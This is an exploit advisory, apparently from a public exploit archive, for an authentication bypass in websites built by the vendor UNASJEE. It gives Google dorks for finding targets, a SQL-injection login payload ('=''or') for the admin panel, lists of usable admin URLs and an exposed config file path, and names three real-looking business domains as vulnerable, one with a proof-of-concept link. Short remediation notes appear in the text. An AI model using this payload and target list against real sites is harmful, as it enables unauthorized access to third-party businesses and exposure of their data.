#################################################################################################

# Exploit Title : "Designed and Developed By UNASJEE" Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
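# CWE : CWE-592 - [ Authentication Bypass Issues ] (CWE-592 is a deprecated entry; given the quote-based login input shown below, the root weakness appears to be CWE-89, SQL Injection, in the login query)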

#################################################################################################

# Google Dork  : 

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

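# Exploit : 

Admin Username : '=''or'

Admin Password : '=''or'

# Root Cause and Fix : A login that accepts this quote-based input is most likely concatenating the submitted username and password directly into the SQL statement that checks the credentials, so the input changes the query's logic instead of being compared as data. The login query should use prepared statements with bound parameters, and the password should be verified in application code against a stored hash (for example with password_verify) rather than matched inside the SQL condition.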

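# Configuration File Path : /admincp/config.inc (a .inc file inside the web root is usually served as plain text instead of being executed as PHP, so any settings it holds are readable by anyone who requests it; it should be moved outside the web root or blocked in the web server configuration)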

# Usable Admin Control Panel URLs => 

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths => 

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/.... 
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...	 
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...	 
/admincp/sdata/secimgs/.. 
/admincp/sdata/subimgs/...

#################################################################################################

# Example Vulnerable Sites => 

tbshandtools.com/admincp/index.php  => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################